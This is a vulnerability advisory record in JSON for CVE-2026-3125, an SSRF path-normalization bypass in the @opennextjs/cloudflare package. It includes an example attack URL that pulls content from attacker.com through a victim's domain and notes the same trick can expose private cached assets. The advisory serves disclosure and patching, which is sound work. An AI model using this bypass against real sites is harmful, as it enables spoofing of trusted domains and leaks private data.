{
  "affected": [
    {
      "ranges": [
        {
          "database_specific": {
            "versions": [
              {
                "introduced": "0"
              },
              {
                "fixed": "1.17.1"
              }
            ]
          },
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "206794f1341023294147e7ef0b09146b7c7caaeb"
            }
          ],
          "repo": "https://github.com/opennextjs/opennextjs-cloudflare",
          "type": "GIT"
        }
      ]
    }
  ],
  "aliases": [
    "GHSA-rvpw-p7vw-wj3m"
  ],
  "details": "A Server-Side Request Forgery (SSRF) vulnerability was identified in the @opennextjs/cloudflare package, resulting from a path normalization bypass in the /cdn-cgi/image/ handler.The @opennextjs/cloudflare worker template includes a /cdn-cgi/image/ handler intended for development use only. In production, Cloudflare's edge intercepts /cdn-cgi/image/ requests before they reach the Worker. However, by substituting a backslash for a forward slash (/cdn-cgi\\image/ instead of /cdn-cgi/image/), an attacker can bypass edge interception and have the request reach the Worker directly. The JavaScript URL class then normalizes the backslash to a forward slash, causing the request to match the handler and trigger an unvalidated fetch of arbitrary remote URLs.\n\nFor example: \n\n https://victim-site.com/cdn-cgi\\image/aaaa/https://attacker.com \n\nIn this example, attacker-controlled content from attacker.com is served through the victim site's domain (victim-site.com), violating the same-origin policy and potentially misleading users or other services.\n\nNote: This bypass only works via HTTP clients that preserve backslashes in paths (e.g., curl --path-as-is). Browsers normalize backslashes to forward slashes before sending requests.\n\nAdditionally, Cloudflare Workers with Assets and Cloudflare Pages suffer from a similar vulnerability. Assets stored under /cdn-cgi/ paths are not publicly accessible under normal conditions. However, using the same backslash bypass (/cdn-cgi\\... instead of /cdn-cgi/...), these assets become publicly accessible. This could be used to retrieve private data. For example, Open Next projects store incremental cache data under /cdn-cgi/_next_cache, which could be exposed via this bypass.",
  "id": "CVE-2026-3125",
  "modified": "2026-04-01T23:08:36.874301969Z",
  "published": "2026-03-04T19:16:19.730Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://www.npmjs.com/package/@opennextjs/cloudflare/v/1.17.1"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-rvpw-p7vw-wj3m"
    },
    {
      "type": "ADVISORY",
      "url": "https://www.cve.org/cverecord?id=CVE-2025-6087"
    },
    {
      "type": "FIX",
      "url": "https://github.com/opennextjs/opennextjs-cloudflare/pull/1147"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}